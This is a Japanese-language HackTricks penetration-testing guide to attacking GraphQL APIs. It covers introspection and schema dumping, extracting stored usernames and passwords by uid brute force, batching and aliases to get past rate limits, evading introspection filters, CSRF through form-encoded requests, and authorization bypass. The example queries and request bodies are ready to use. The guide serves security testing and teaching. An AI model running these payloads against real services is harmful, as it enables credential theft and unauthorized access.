hacktricks/network-services-pentesting/pentesting-web/graphql.md

GraphQL

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ会社で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
• 公式のPEASS＆HackTricksのグッズを手に入れましょう。
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
• ハッキングのトリックを共有するために、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

はじめに

GraphQLはREST APIの代替として機能します。REST APIでは、クライアントはバックエンドデータベースからデータをクエリするために複数のリクエストを異なるエンドポイントに送信する必要があります。GraphQLでは、バックエンドをクエリするために1つのリクエストのみを送信する必要があります。これは、複数のリクエストをAPIに送信する必要がないため、はるかにシンプルです。

GraphQL

新しい技術が登場するにつれて、新しい脆弱性も登場します。デフォルトでは、GraphQLは認証を実装していません。これは開発者が実装する必要があることを意味します。つまり、デフォルトではGraphQLは誰でもクエリでき、機密情報は認証されていない攻撃者に利用可能です。

ディレクトリブルートフォース攻撃を実行する際には、次のパスを追加してGraphQLインスタンスをチェックしてください。

• /graphql
• /graphiql
• /graphql.php
• /graphql/console
• /api
• /api/graphql
• /graphql/api
• /graphql/graphql

オープンなGraphQLインスタンスを見つけたら、どのクエリをサポートしているかを知る必要があります。これは、内省システムを使用して行うことができます。詳細については、こちらを参照してください：GraphQL: A query language for APIs.
It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…

フィンガープリント

ツールgraphw00fは、サーバーで使用されているGraphQLエンジンを検出し、セキュリティ監査人に役立つ情報を表示することができます。

ユニバーサルクエリ

GraphQLエンドポイントにquery{__typename}を送信すると、レスポンスのどこかに{"data": {"__typename": "query"}}という文字列が含まれます。これはユニバーサルクエリと呼ばれ、URLがGraphQLサービスに対応しているかどうかを調査するための便利なツールです。

このクエリは、すべてのGraphQLエンドポイントには、クエリされたオブジェクトのタイプを文字列として返す__typenameという予約済みフィールドがあるため機能します。

基本的な列挙

GraphQLは通常、GET、POST（x-www-form-urlencoded）、POST（json）をサポートしています。ただし、セキュリティのためにはCSRF攻撃を防ぐためにjsonのみを許可することが推奨されています。

内省

スキーマ情報を発見するために内省を使用するには、__schemaフィールドをクエリします。このフィールドはすべてのクエリのルートタイプで利用可能です。

query={__schema{types{name,fields{name}}}}

このクエリを使用すると、使用されているすべてのタイプの名前を見つけることができます：

{% code overflow="wrap" %}

query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

{% endcode %}

このクエリを使用すると、すべてのタイプ、フィールド、および引数（および引数のタイプ）を抽出できます。これはデータベースのクエリ方法を知るために非常に役立ちます。

エラー

エラーが表示されるかどうかを知ることは興味深いです。これは有用な情報を提供します。

?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}

内省を介してデータベーススキーマを列挙する

{% hint style="info" %} 内省が有効になっている場合でも、上記のクエリが実行されない場合は、クエリ構造から onOperation、onFragment、および onField の指示を削除してみてください。 {% endhint %}

#Full introspection query

query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation  #Often needs to be deleted to run query
onFragment   #Often needs to be deleted to run query
onField      #Often needs to be deleted to run query
}
}
}

fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}

fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}

fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}

インラインインスペクションクエリー：

/?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}

最後のコード行は、GraphQLのメタ情報（オブジェクト名、パラメータ、タイプなど）をすべてダンプするGraphQLクエリです。

もしインスペクションが有効になっている場合、GraphQL Voyagerを使用してGUIですべてのオプションを表示することができます。

クエリング

データベース内に保存されている情報の種類がわかったので、いくつかの値を抽出してみましょう。

インスペクションで、直接クエリを実行できるオブジェクト（存在するだけではクエリできません）を見つけることができます。次の画像では、"queryType"が"Query"と呼ばれ、"Query"オブジェクトのフィールドの1つが"flags"であり、これもオブジェクトのタイプです。したがって、フラグオブジェクトをクエリできます。

クエリ"flags"のタイプが"Flags"であることに注意してください。このオブジェクトは以下のように定義されています：

"Flags"オブジェクトは名前と値で構成されていることがわかります。したがって、次のクエリですべてのフラグの名前と値を取得できます：

query={flags{name, value}}

注意してください。クエリするオブジェクトが次の例のように文字列のようなプリミティブな型である場合は、次のようにクエリすることができます。

query={hiddenFlags}

別の例では、"Query"タイプオブジェクト内に2つのオブジェクトがある場合があります: "user"と"users"。 これらのオブジェクトは検索に引数が必要ない場合、欲しいデータを要求するだけでそれらからすべての情報を取得することができます。このインターネットの例では、保存されたユーザー名とパスワードを抽出することができます。

しかし、この例ではそれを試みると、次のエラーが表示されます。

どうやら、何らかの方法で"uid"というタイプが_Int_の引数を使用して検索されるようです。 とにかく、私たちはすでにそれを知っていました。基本的な列挙のセクションでは、必要なすべての情報を表示するクエリが提案されていました: query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}

そのクエリを実行したときに提供された画像を読むと、"user"には_Int_タイプの"uid"というargがあることがわかります。

したがって、軽いuidブルートフォースを実行すると、_uid=1_でユーザー名とパスワードが取得されることがわかりました:
query={user(uid:1){user,password}}

注意してください。私は"user"と"password"のparametersを要求できることを発見しました。なぜなら、存在しないものを探そうとすると(query={user(uid:1){noExists}})、次のエラーが表示されるからです。

そして、列挙フェーズ中に、"dbuser"オブジェクトには"user"と"password"というフィールドがあることがわかりました。

クエリ文字列のダンプトリック（@BinaryShadow_さんに感謝）

もし、query={theusers(description: ""){username,password}}のように文字列タイプで検索できる場合、空の文字列で検索するとすべてのデータがダンプされます。（この例はチュートリアルの例とは関係ありません。この例では、"theusers"という名前のStringフィールドの"description"を使用して検索できると仮定します。）

GraphQLは比較的新しい技術であり、スタートアップや大企業の間で徐々に注目を集めています。デフォルトでは認証が不足しているため、GraphQLエンドポイントはIDORなどの他のバグにも脆弱性があります。

検索

この例では、メールアドレスと名前で識別される人物と、名前と評価で識別される映画のデータベースを想像してください。人物は他の人物と友達になることができ、人物は映画を持つことができます。

名前で人物を検索し、そのメールアドレスを取得することができます：

{
searchPerson(name: "John Doe") {
email
}
}

次のようにして、名前で人物を検索し、彼らが購読している映画を取得することができます：

query {
  person(name: "名前") {
    subscribedFilms {
      title
    }
  }
}

{
searchPerson(name: "John Doe") {
email
subscribedMovies {
edges {
node {
name
}
}
}
}
}

次に、人物のsubscribedMoviesのnameを取得する方法が示されていることに注目してください。

また、同時に複数のオブジェクトを検索することもできます。この場合、2つの映画を検索します。

{
searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
name
}
}r

または、エイリアスを使用して複数の異なるオブジェクトの関係を表すこともできます:

{
johnsMovieList: searchPerson(name: "John Doe") {
subscribedMovies {
edges {
node {
name
}
}
}
}
davidsMovieList: searchPerson(name: "David Smith") {
subscribedMovies {
edges {
node {
name
}
}
}
}
}

ミューテーション

ミューテーションは、サーバーサイドでの変更を行うために使用されます。

インスペクションでは、宣言されたミューテーションを見つけることができます。以下の画像では、"MutationType"が"Mutation"と呼ばれ、"Mutation"オブジェクトにはミューテーションの名前（この場合は"addPerson"など）が含まれています。

この例では、メールと名前で識別される人物と、名前と評価で識別される映画のデータベースを想像してください。人物は他の人物と友達になることができ、人物は映画を持つことができます。

データベース内に新しい映画を作成するためのミューテーションは、次のようになります（この例ではミューテーションはaddMovieと呼ばれています）：

mutation {
addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
movies {
name
rating
}
}
}

注意してください、クエリ内ではデータの値と型が示されています。

また、mutation によって persons を 作成 することもあります（この例では addPerson と呼ばれます）。友達やファイルを持つ人物を作成する場合、友達やファイルは事前に存在している必要があります。

mutation {
addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
person {
name
email
friends {
edges {
node {
name
email
}
}
}
subscribedMovies {
edges {
node {
name
rating
releaseYear
}
}
}
}
}
}

1つのAPIリクエストでのバッチングブルートフォース

この情報はhttps://lab.wallarm.com/graphql-batching-attack/から取得されました。
異なる認証情報を持つ多くのクエリを同時に送信して認証するGraphQL API。これはクラシックなブルートフォース攻撃ですが、GraphQLのバッチング機能により、1つのHTTPリクエストに複数のログイン/パスワードペアを送信することが可能になりました。このアプローチにより、外部のレート監視アプリケーションはすべてが正常であり、パスワードを推測しようとするブルートフォースボットが存在しないと思わせることができます。

以下に、アプリケーションの認証リクエストの最も単純なデモンストレーションがあります。3つの異なるメール/パスワードペアを同時に送信しています。もちろん、同じ方法で1つのリクエストに数千を送信することも可能です。

レスポンスのスクリーンショットからわかるように、最初と3番目のリクエストは_null_を返し、_error_セクションに対応する情報を反映しています。2番目のミューテーションは正しい認証データを持ち、レスポンスには正しい認証セッショントークンが含まれています。

イントロスペクションなしのGraphQL

GraphQLエンドポイントでのイントロスペクションの無効化がますます増えています。ただし、予期しないリクエストが受信された場合にGraphQLがスローするエラーは、clairvoyanceなどのツールによってスキーマの大部分を再作成するのに十分です。

さらに、Burp Suiteの拡張機能GraphQuailは、Burpを介して通過するGraphQL APIリクエストを監視し、新しいクエリごとに内部のGraphQL スキーマを構築します。また、GraphiQLとVoyagerのためにスキーマを公開することもできます。この拡張機能は、イントロスペクションクエリを受け取った場合に偽のレスポンスを返します。その結果、GraphQuailはAPI内で使用できるすべてのクエリ、引数、およびフィールドを表示します。詳細については、こちらを参照してください。

ここでGraphQLエンティティを発見するための素晴らしいワードリストが見つかります。

GraphQLイントロスペクション防御のバイパス

テストしているAPIでイントロスペクションクエリを実行できない場合は、__schemaキーワードの後に特殊文字を挿入してみてください。

開発者がイントロスペクションを無効にした場合、クエリ内の__schemaキーワードを除外するために正規表現を使用することがあります。GraphQLではスペース、改行、カンマなどの文字は無視されますが、不正な正規表現では無視されません。

したがって、開発者が__schema{のみを除外した場合、以下のイントロスペクションクエリは除外されません。

#Introspection query with newline
{
"query": "query{__schema
{queryType{name}}}"
}

もし動作しない場合は、代替のリクエストメソッドでプローブを実行してみてください。インロスペクションはPOSTでのみ無効になっている場合があります。GETリクエストや、x-www-form-urlencodedというコンテンツタイプを持つPOSTリクエストを試してみてください。

漏洩したGraphQLの構造

もしインロスペクションが無効になっている場合は、ウェブサイトのソースコードを確認してみてください。クエリはしばしばブラウザに事前に読み込まれたJavaScriptライブラリとして保存されています。これらの事前に書かれたクエリは、各オブジェクトや関数のスキーマと使用方法に関する重要な情報を明らかにすることがあります。開発者ツールのSourcesタブでは、クエリが保存されているファイルを検索することができます。時には管理者保護されたクエリさえも既に公開されていることがあります。

Inspect/Sources/"Search all files"
file:* mutation
file:* query

GraphQLにおけるCSRF

CSRFが何かわからない場合は、以下のページを読んでください：

{% content-ref url="../../pentesting-web/csrf-cross-site-request-forgery.md" %} csrf-cross-site-request-forgery.md {% endcontent-ref %}

そこでは、CSRFトークンなしで構成されたいくつかのGraphQLエンドポイントを見つけることができます。

GraphQLリクエストは通常、Content-Type **application/json**を使用してPOSTリクエストで送信されます。

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

ただし、ほとんどのGraphQLエンドポイントは**form-urlencodedのPOSTリクエスト**もサポートしています：

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

したがって、前述のようなCSRFリクエストはプリフライトリクエストなしで送信されるため、CSRFを悪用してGraphQLで変更を行うことが可能です。

ただし、Chromeのsamesiteフラグの新しいデフォルトクッキー値はLaxです。これは、クッキーがサードパーティのWebからのGETリクエストでのみ送信されることを意味します。

また、クエリリクエストもGETリクエストとして送信することができ、GETリクエストではCSRFトークンが検証されない可能性があることに注意してください。

また、XS-Search 攻撃を悪用することで、ユーザーの資格情報を悪用してGraphQLエンドポイントからコンテンツを外部に漏洩させることが可能です。

詳細については、こちらの元の投稿を参照してください。

GraphQLにおける認証

エンドポイントで定義された多くのGraphQL関数は、リクエスターの認証のみをチェックし、認可は行いません。

クエリの入力変数を変更することで、機密のアカウント詳細が漏洩する可能性があります。

ミューテーションは、他のアカウントデータを変更しようとすることで、アカウント乗っ取りにつながる可能性さえあります。

{
"operationName":"updateProfile",
"variables":{"username":INJECT,"data":INJECT},
"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
}

GraphQLでの認証のバイパス

クエリのチェーンを使用すると、弱い認証システムをバイパスできます。

以下の例では、操作が「forgotPassword」であり、それに関連するforgotPasswordクエリのみが実行されるべきであることがわかります。これは、末尾にクエリを追加することでバイパスすることができます。この場合、"register"というクエリと、新しいユーザーとしてシステムに登録するためのユーザー変数を追加します。

エイリアスを使用したレート制限のバイパス

通常、GraphQLオブジェクトには同じ名前の複数のプロパティを含めることはできません。エイリアスを使用すると、APIに返してほしいプロパティを明示的に指定することで、この制限をバイパスできます。エイリアスを使用すると、1つのリクエストで同じタイプのオブジェクトの複数のインスタンスを返すことができます。

GraphQLのエイリアスに関する詳細は、エイリアスを参照してください。

エイリアスは、必要なAPI呼び出しの数を制限するために意図されていますが、GraphQLエンドポイントをブルートフォースするためにも使用することができます。

多くのエンドポイントでは、ブルートフォース攻撃を防ぐために何らかのレート制限装置が設けられています。一部のレート制限装置は、エンドポイントで実行される操作の数ではなく、受信したHTTPリクエストの数に基づいて動作します。エイリアスは、実質的に1つのHTTPメッセージで複数のクエリを送信できるようにするため、この制限をバイパスできます。

以下は、エイリアスを使用してストアの割引コードが有効かどうかを確認する一連のエイリアス付きクエリの簡略化された例です。この操作は、1つのHTTPリクエストで行われるため、一度に膨大な数の割引コードをチェックすることができる可能性があり、レート制限をバイパスすることができます。

#Request with aliased queries
query isValidDiscount($code: Int) {
isvalidDiscount(code:$code){
valid
}
isValidDiscount2:isValidDiscount(code:$code){
valid
}
isValidDiscount3:isValidDiscount(code:$code){
valid
}
}

ツール

脆弱性スキャナー

• https://github.com/gsmith257-cyber/GraphCrawler: スキーマを取得し、機密データを検索し、認証をテストし、スキーマをブルートフォース攻撃し、指定されたタイプへのパスを見つけるために使用できるツールキットです。
• https://blog.doyensec.com/2020/03/26/graphql-scanner.html: スタンドアロンまたはBurp拡張として使用できます。
• https://github.com/swisskyrepo/GraphQLmap: CLIクライアントとしても使用でき、攻撃を自動化するためにも使用できます。
• https://gitlab.com/dee-see/graphql-path-enum: GraphQLスキーマで指定されたタイプに到達するさまざまな方法をリストするツールです。
• https://github.com/doyensec/inql: 高度なGraphQLテストのためのBurp拡張機能です。InQL v5.0のコアである_Scannerでは、GraphQLエンドポイントまたはローカルの内部スキーマファイルを分析できます。すべての可能なクエリとミューテーションを自動生成し、分析のために構造化されたビューに整理します。Attacker_コンポーネントでは、バッチGraphQL攻撃を実行できます。これは、実装が不十分なレート制限を回避するために役立ちます。

クライアント

• https://github.com/graphql/graphiql: GUIクライアント
• https://altair.sirmuel.design/: GUIクライアント

自動テスト

{% embed url="https://graphql-dashboard.herokuapp.com/" %}

• AutoGraphQLの説明ビデオ: https://www.youtube.com/watch?v=JJmufWfVvyU

参考文献

• https://jondow.eu/practical-graphql-attack-vectors/
• https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
• https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4
• http://ghostlulz.com/api-hacking-graphql/
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md
• https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
• https://portswigger.net/web-security/graphql

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• **サイバーセキュリティ企業で働いていますか？ HackTricksであなたの会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを発見しましょう、私たちの独占的なNFTのコレクション
• 公式のPEASS＆HackTricksのスワッグを手に入れましょう
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。
• ハッキングのトリックを共有するには、hacktricks repo と hacktricks-cloud repo にPRを提出してください。